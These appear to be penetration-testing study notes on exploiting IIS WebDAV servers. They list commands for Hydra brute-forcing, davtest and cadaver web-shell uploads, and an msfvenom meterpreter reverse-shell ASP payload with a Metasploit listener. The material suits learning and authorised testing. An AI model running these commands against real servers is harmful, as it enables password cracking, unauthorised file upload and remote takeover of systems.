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IIS - Propriotary - has GUI for managing websies
Can run static and dynamic pages using ASP.NET and PHP
Runs typically in 80 or 443
WebDAV Used for editing and managing files on servers
Runs on top of Apache or IIS on 80 or 443
Requires Authentication
Exploiting Web dav
- Discover WEbdav
- Brute force on server
- After Auth upload .asp payload for revese shell
- davtest - scan auth and exploit webdav server
- cadaver - working with webdav
Nmap scripts
http-webdav-scan http-enum
Brute force - hydra
hydra -L /path/to/username list -P /path/to/password list ip http-get /webdav/
Using Davtest
davtest -url <target-server>/webdav
- unauthenticated
davtest -auth username:password -url <target-server>/webdav
Checks webdav conection and finds out what files can be uploaded and what files can be executed
Using cadaver
cadaver http://targert-url
upload web shell
put /usr/share/webshells/asp/webshell.asp
Exploiting using metasploit - reverese shell
Generating metasploit payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker-id LPORT=a port in attacker machine -f asp > filename.asp
upload as before using cadaver
start postgresql n msfconsole-
service postgresql start && msfconsole
To setup listener
use multi/handler
set payload windows/meterpreter/reverse_tcp
Set the LHOST and LPORT as before
run the listener
run getuid and sysinfo to understand sys and user priv
use /exploit/windows/iis/iss_webdav_upload_asp